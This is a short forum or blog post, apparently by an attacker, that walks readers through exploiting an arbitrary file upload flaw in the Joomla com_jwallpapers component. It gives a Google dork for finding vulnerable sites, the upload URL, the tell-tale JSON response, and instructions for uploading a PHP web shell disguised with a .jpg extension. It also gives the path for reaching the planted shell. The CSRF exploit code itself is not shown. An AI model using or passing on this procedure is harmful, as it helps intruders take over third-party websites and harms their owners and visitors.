Hello guys...am goin to share joomla com_jwallpapers Component
Arbitrary File Upload vunlnerability exploit..
Google Dork: inurl:/index.php? option=com_jwallpapers
select one of the web,then enter this exploit: /index.php? option=com_jwallpapers&task=upload
If it vuln u'll see something like ~ { "jsonrpc": "2.0",
"result": null, "id": "en"}
CSRF Xploit Code:
click here and copy
NB: Change parts shell_kalian.php with the name of the shell that you want it (ex:
shell.php), and also shell that you
upload must be -.jpg extension (ex:
shell.jpg). Without having to use tamper
data and so on..
Shell Access:
http://target.com/ jwallpapers_files/plupload/shell_kalian.php
Stil remember that, the shell must be a .jpg extension, and later change the name of your shell e.g kalian.php, like that Kalian wrote on CSRF, extension also be .php....
No comments:
Post a Comment